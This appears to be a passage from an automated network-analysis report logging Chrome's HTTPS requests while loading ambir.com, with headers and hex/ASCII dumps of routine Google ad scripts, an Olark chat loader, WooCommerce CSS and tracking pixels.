                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:32 UTC687INData Raw: 31 32 64 39 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 61 2c 63 29 7b 69 66 28 62 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 62 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 62 3b 62 5b 61 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 62 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                              Data Ascii: 12d9(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&global
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1390INData Raw: 22 2e 22 29 3b 62 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 64 5b 30 5d 2c 67 3b 21 62 26 26 65 20 69 6e 20 71 3f 67 3d 71 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 6e 26 26 63 3d 3d 3d 22 65 73 36 22 3f 67 5b 64 5d 3a 6e 75 6c 6c 3b 61 3d 61 28 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 62 3f 68 28 71 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 61 7d 29 3a 61 21 3d 3d 63 26 26 28 74 5b 64 5d 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 4d 61 74 68 2e 72 61
                                                                                                                                                                                              Data Ascii: ".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.ra
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1390INData Raw: 31 29 3b 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 3b 61 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 7d 3b 61 2e 73 72 63 3d 62 7d 3b 76 61 72 20 46 2c 47 3b 61 3a 7b 66 6f 72 28 76 61 72 20 48 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 49 3d 78 2c 4a 3d 30 3b 4a 3c 48 2e 6c 65 6e 67 74 68 3b 4a 2b 2b 29 69 66 28 49 3d 49 5b 48 5b 4a 5d 5d 2c 49 3d 3d 6e 75 6c 6c 29 7b 47 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 47 3d 49 7d 76 61 72 20 4b 3d 47 26 26 47 5b 36 31 30 34 30 31 33 30 31 5d 3b 46 3d 4b 21 3d 6e 75 6c 6c 3f 4b 3a 21 31 3b 76 61 72 20 4c 2c 4d 3d 78 2e 6e 61 76 69 67 61 74 6f 72 3b 4c 3d 4d 3f 4d 2e 75 73 65 72 41
                                                                                                                                                                                              Data Ascii: 1);a.onload=function(){a.onload=null};a.onerror=function(){a.onerror=null};a.src=b};var F,G;a:{for(var H=["CLOSURE_FLAGS"],I=x,J=0;J<H.length;J++)if(I=I[H[J]],I==null){G=null;break a}G=I}var K=G&&G[610401301];F=K!=null?K:!1;var L,M=x.navigator;L=M?M.userA
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1366INData Raw: 73 72 63 7c 7c 28 70 3d 72 29 3b 70 7c 7c 28 70 3d 6e 65 77 20 49 6d 61 67 65 2c 64 26 26 64 5b 66 2e 67 5d 26 26 28 70 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 45 28 64 5b 6c 2e 67 5d 29 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 70 2e 6f 6e 6c 6f 61 64 3d 65 3b 70 2e 73 72 63 3d 63 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 56 3d 5b 22 73 73 5f 22 5d 2c 57 3d 73 7c 7c 78 3b 20 56 5b 30 5d 69 6e 20 57 7c 7c 74 79 70 65 6f 66 20 57 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 57 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 56 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 58 3b 56 2e 6c 65 6e 67 74 68 26 26 28 58 3d 56 2e 73 68 69 66 74 28 29 29 3b
                                                                                                                                                                                              Data Ascii: src||(p=r);p||(p=new Image,d&&d[f.g]&&(p.onerror=function(l){return function(){E(d[l.g])&&e()}}(f)));p.onload=e;p.src=c[f.g]}e()}var V=["ss_"],W=s||x; V[0]in W||typeof W.execScript=="undefined"||W.execScript("var "+V[0]);for(var X;V.length&&(X=V.shift());
                                                                                                                                                                                              2024-11-20 20:28:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              117192.168.2.549859192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:31 UTC358OUTGET /jsclient/loader.js HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:31 UTC416INHTTP/1.1 200 OK
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 5523
                                                                                                                                                                                              Cache-Control: max-age=10800
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Etag: "673d0962-2325+ident"
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 23:28:31 GMT
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 21:55:46 GMT
                                                                                                                                                                                              Server: ECS (lhd/3709)
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 8997
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:31 UTC8997INData Raw: 21 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 6e 2c 6f 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 61 2c 73 29 7b 69 66 28 21 6e 5b 61 5d 29 7b 69 66 28 21 65 5b 61 5d 29 7b 76 61 72 20 6c 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 73 26 26 6c 29 72 65 74 75 72 6e 20 6c 28 61 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 61 2c 21 30 29 3b 76 61 72 20 75 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 61 2b 22 27 22 29 3b 74 68 72 6f 77 20 75 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 75 7d 76 61 72 20 63 3d 6e 5b 61 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 5b 61 5d 5b 30 5d 2e 63 61
                                                                                                                                                                                              Data Ascii: !function t(e,n,o){function r(a,s){if(!n[a]){if(!e[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var u=new Error("Cannot find module '"+a+"'");throw u.code="MODULE_NOT_FOUND",u}var c=n[a]={exports:{}};e[a][0].ca


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              118192.168.2.549863141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1880OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-ee83140b.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:32 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:06 GMT
                                                                                                                                                                                              ETag: W/"673e29fa-1d04"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6832
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fdb5fcb0f43-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:32 UTC893INData Raw: 31 64 30 34 0d 0a 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 39 65 36 65 64 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 62 33 61 66 35 34 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 63
                                                                                                                                                                                              Data Ascii: 1d04:root{--woocommerce:#7F54B3;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#7F54B3;--wc-primary-text:white;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#b3af54;--wc-highligh-text:white;--wc-c
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1369INData Raw: 74 72 20 74 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 5f 72 65 73 70 6f 6e 73 69 76 65 20 74 72 20 74 64 2e 6f 72 64 65 72 2d 61 63 74 69 6f 6e 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 5f 72 65 73 70 6f 6e 73 69 76 65 20 74 72 20 74 64 2e 6f 72 64 65 72 2d 61 63 74 69 6f 6e 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 5f 72 65 73 70 6f 6e 73 69 76 65 20 74 72 20 74 64 3a 3a 62 65 66 6f 72 65 2c
                                                                                                                                                                                              Data Ascii: tr td{display:block;text-align:right!important}.woocommerce table.shop_table_responsive tr td.order-actions,.woocommerce-page table.shop_table_responsive tr td.order-actions{text-align:left!important}.woocommerce table.shop_table_responsive tr td::before,
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1369INData Raw: 2e 63 6f 6c 2d 31 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 6f 6c 32 2d 73 65 74 20 2e 63 6f 6c 2d 32 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 5b 63 6c 61 73 73 2a 3d 63 6f 6c 75 6d 6e 73 2d 5d 20 6c 69 2e 70 72 6f 64 75 63 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 5b 63 6c 61 73 73 2a 3d 63 6f 6c 75 6d 6e 73 2d 5d 20 6c 69 2e 70 72 6f 64 75 63 74 7b 77 69 64 74 68 3a 34 38 25 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 6d 61 72 67 69 6e 3a 30 20 30 20 32 2e 39 39 32 65 6d 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 5b 63 6c 61 73
                                                                                                                                                                                              Data Ascii: .col-1,.woocommerce-page .col2-set .col-2{float:none;width:100%}.woocommerce ul.products[class*=columns-] li.product,.woocommerce-page ul.products[class*=columns-] li.product{width:48%;float:left;clear:both;margin:0 0 2.992em}.woocommerce ul.products[clas
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1369INData Raw: 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d
                                                                                                                                                                                              Data Ascii: t:none;padding-bottom:.5em}.woocommerce #content table.cart td.actions .coupon::after,.woocommerce #content table.cart td.actions .coupon::before,.woocommerce table.cart td.actions .coupon::after,.woocommerce table.cart td.actions .coupon::before,.woocomm
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1369INData Raw: 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 69 6e 70 75 74 2d 74 65 78 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 69 6e 70 75 74 7b 77 69 64 74 68 3a 34 38 25 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 69 6e 70 75 74 2d 74 65 78 74 2b 2e 62 75 74 74 6f 6e 2c
                                                                                                                                                                                              Data Ascii: t td.actions .coupon .input-text,.woocommerce-page table.cart td.actions .coupon input{width:48%;box-sizing:border-box}.woocommerce #content table.cart td.actions .coupon .button.alt,.woocommerce #content table.cart td.actions .coupon .input-text+.button,
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1067INData Raw: 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 73 68 69 70 70 69 6e 67 5f 63 61 6c 63 75 6c 61 74 6f 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 63 61 72 74 5f 74 6f 74 61 6c 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 63 72 6f 73 73 2d 73 65 6c 6c 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 73 68 69 70 70 69 6e 67 5f 63 61 6c 63 75 6c 61 74 6f 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f
                                                                                                                                                                                              Data Ascii: .cart-collaterals .shipping_calculator,.woocommerce-page .cart-collaterals .cart_totals,.woocommerce-page .cart-collaterals .cross-sells,.woocommerce-page .cart-collaterals .shipping_calculator{width:100%;float:none;text-align:left}.woocommerce-page.wooco
                                                                                                                                                                                              2024-11-20 20:28:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              119192.168.2.549862172.217.21.364431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:32 UTC1393OUTGET /pagead/1p-user-list/1070729751/?random=1732134501018&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d1SlNRPFvX_ESY-YlKzOQAPb8Frqnwu7evj9JK9Nc3KMSflbX&random=1339105251&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:32 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:32 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:32 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              120192.168.2.549865172.217.21.364431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:32 UTC479OUTGET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1
                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:33 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="recaptcha"
                                                                                                                                                                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                              Content-Length: 18160
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: sffe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:10:16 GMT
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 21:00:16 GMT
                                                                                                                                                                                              Cache-Control: public, max-age=3000
